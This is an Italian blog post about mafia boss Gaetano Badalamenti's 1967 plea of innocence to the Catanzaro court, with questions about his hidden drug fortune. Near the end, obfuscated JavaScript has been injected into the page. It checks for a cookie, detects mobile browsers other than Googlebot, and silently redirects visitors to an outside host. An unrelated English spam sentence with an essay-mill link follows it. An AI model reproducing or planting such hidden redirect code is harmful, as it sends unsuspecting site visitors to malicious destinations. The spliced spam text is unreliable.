greyimg

Quando don Tano prendeva per il c. i giudici

Scritto da Salvo Palazzolo il 17 maggio 2010
Pubblicato nella categoria Senza categoria

Penso proprio che sarebbero piaciute a Peppino Impastato queste pagine che ho trovato in un vecchio archivio giudiziario. Sono le pagine scritte da Gaetano Badalamenti, don Tano da Cinisi, che nel 1967 così si rivolgeva ai giudici di Catanzaro che lo stavano processando assieme a tutto il gotha della mafia palermitana: “Prego la Corte non volere interpretare la mia assenza come mancato ossequio alla legge. Sono quasi in fin di vita, roso da mali incurabili che si sono sempre più aggravati (dimostrati dalla documentazione allegata in atti). Le cure continue cui mi sono sottoposto e che mi hanno tenuto sia pure con tenue filo alla vita, non mi sarebbero certo potuti praticare in carcere.
Confida ciò all’umana comprensione dei giudici per essere scusata. Anche le sofferenze dello innocente.
Costretto a vivere nascosto non sono inferiore a quelle procurate dal carcere.
Spero che dopo tanti dolori sarà riconosciuta la mia innoccenza.
Io infatti, ho vissuto di lavoro e sono del tutto innoccente a quanto mi si addebita in quanto mai ho avuto rapporti illeciti con chicchessia e tanto meno con persone che figurano imputate nell’attuale procedimento (…)”

Se queste pagine fossero finite nella redazione di Radio Aut, Peppino Impastato avrebbe scritto di certo una memorabile pagina di satira antimafia. A noi non resta che scorrere queste carte che da 40 anni sono agli atti del processo di Catanzaro e provare a immaginare la voce di Peppino, come la sentiamo nel bellissimo sito a lui dedicato dall’associazione

E dopo aver ricordato ancora una volta Peppino, non resta che farsi qualche domanda. Questa volta seria, molto seria.
1. Dov’è finito il tesoro accumulato da Gaetano Badalamenti (quello che stava morendo) con il traffico internazionale di droga?
2. Perché la Svizzera si è sempre rifiutata di dare informazioni ai giudici italiani sul conto Wall Street 461, che era la cassaforte di Badalamenti scoperta da Giovanni Falcone?
3. Perché i figli del capomafia di Cinisi, Vito e Leonardo, continuano a trascorrere una latitanza dorata in Sud America?

Ecco l’appassionata difesa di Gaetano Badalamenti:

“Lunga vita a don Tano seduto”: al processo di Catanzaro fu assolto. E dopo, davvero lunga vita ha avuto! Non ha mai ricevuto una condanna per associazione mafiosa. E la condanna per l’omicidio di Peppino Impastato è arrivata davvero troppo tardi, dopo depistaggi e favori istituzionali ancora tutti da chiarire. var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} Some team members were sure it would be a factor, especially if the incoming class would otherwise be http://essayprofs.com/ short on african-americans and hispanics

Lascia un commento

Stai leggendo Quando don Tano prendeva per il c. i giudici

 Username (*richiesto)

 Email (*non verrà mostrato)

 Sito web (*opzionale)

Archivio della memoria